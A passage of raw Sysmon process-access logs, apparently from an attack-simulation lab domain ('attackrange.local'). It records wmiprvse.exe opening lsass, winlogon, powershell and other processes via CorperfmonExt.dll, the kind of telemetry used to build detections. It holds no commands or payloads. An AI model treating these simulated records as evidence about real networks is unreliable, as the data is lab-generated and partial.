indows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006357Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0F00-000000009101}1144C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006356Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006355Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8541-5FCF-0E00-000000009101}1084C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006354Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006353Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0D00-000000009101}992C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006352Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006351Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-8540-5FCF-0C00-000000009101}596C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006350Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006349Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006348Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006347Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.576{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-853E-5FCF-0900-000000009101}784C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006346Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006345Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A7-5FCF-F700-000000009101}816C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006344Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006343Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F300-000000009101}4636C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006342Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006341Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F200-000000009101}748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006340Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006339Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F100-000000009101}4156C:\Windows\system32\cmd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006338Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006337Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-F000-000000009101}4836C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006336Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006335Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A6-5FCF-EF00-000000009101}4148C:\Windows\system32\WinrsHost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006334Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:54:48.529{10ACEC4A-8552-5FCF-4900-000000009101}39281180C:\Windows\system32\wbem\wmiprvse.exe{10ACEC4A-85A5-5FCF-EE00-000000009101}2796C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006333Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 